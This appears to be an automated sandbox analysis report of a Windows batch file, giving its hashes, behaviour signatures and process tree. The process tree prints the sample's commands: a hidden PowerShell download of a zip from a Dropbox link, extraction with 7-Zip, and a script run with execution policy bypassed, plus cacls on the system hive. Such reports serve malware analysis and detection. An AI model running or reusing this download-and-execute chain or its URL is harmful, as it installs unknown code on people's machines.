Analysis
-
max time kernel
360s -
max time network
319s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
19-11-2024 20:58
Static task
static1
Behavioral task
behavioral1
Sample
slut_keep_admin.bat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
slut_keep_admin.bat
Resource
win10v2004-20241007-en
General
-
Target
slut_keep_admin.bat
-
Size
1KB
-
MD5
9152962b6cef0d476f4e89127d8f0255
-
SHA1
b3b0b2686f0b27eff516ca35443feff8ff5f8026
-
SHA256
70fbc646366a3184c596ed7cba7055f1405350d164d104fcf4c2eec71c9d6434
-
SHA512
b609ecc36ea6e417b45099092d1511da78af19855252cbf5050d30abd6d2ee3def57518c5c8676e25e0786cfd22c7bd5dcd98a4da725db2fa102256ad4f3d80e
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2804 powershell.exe 2804 powershell.exe 2720 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2804 powershell.exe 2720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exe7z.exepowershell.exeAUDIODG.EXEdescription pid process Token: SeDebugPrivilege 2804 powershell.exe Token: SeRestorePrivilege 2316 7z.exe Token: 35 2316 7z.exe Token: SeSecurityPrivilege 2316 7z.exe Token: SeDebugPrivilege 2720 powershell.exe Token: 33 1136 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1136 AUDIODG.EXE Token: 33 1136 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1136 AUDIODG.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exedescription pid process target process PID 2380 wrote to memory of 2552 2380 cmd.exe cacls.exe PID 2380 wrote to memory of 2552 2380 cmd.exe cacls.exe PID 2380 wrote to memory of 2552 2380 cmd.exe cacls.exe PID 2380 wrote to memory of 2804 2380 cmd.exe powershell.exe PID 2380 wrote to memory of 2804 2380 cmd.exe powershell.exe PID 2380 wrote to memory of 2804 2380 cmd.exe powershell.exe PID 2380 wrote to memory of 2316 2380 cmd.exe 7z.exe PID 2380 wrote to memory of 2316 2380 cmd.exe 7z.exe PID 2380 wrote to memory of 2316 2380 cmd.exe 7z.exe PID 2380 wrote to memory of 2720 2380 cmd.exe powershell.exe PID 2380 wrote to memory of 2720 2380 cmd.exe powershell.exe PID 2380 wrote to memory of 2720 2380 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\slut_keep_admin.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -c "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fo/k55ow4tu1244zp5vbpkdf/AH836nAwzR-bPAcWIy0mnFU?rlkey=6s1decbh5kqtkju1mr1sbjg4s&raw=1' -OutFile 'C:/ProgramData/slut/files.zip'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Program Files\7-Zip\7z.exe"C:/Program Files/7-Zip/7z.exe" x -aoa "C:/ProgramData/slut/files.zip"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "installJavaAndApp.ps1"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2028
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5d01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IULJKMZKPHDZ8WVHRAIT.temp
Filesize7KB
MD53bfdf6f6c4ee8ba395b96a3697d28ba5
SHA159bcc08fd64cd585e5d523f37da2339f551cbc48
SHA256f38230bd9f6f84df2c3acb46f28216fa8835b99005b7699150dda41c1baead66
SHA5123fee1df6a3d5ba19120e335104eb19d3b121b711b3f21597a432b365db448cf3642ed46439f8c4aa7440d4c8c35e8d0385065bbbb77a381bf9280e65edc67919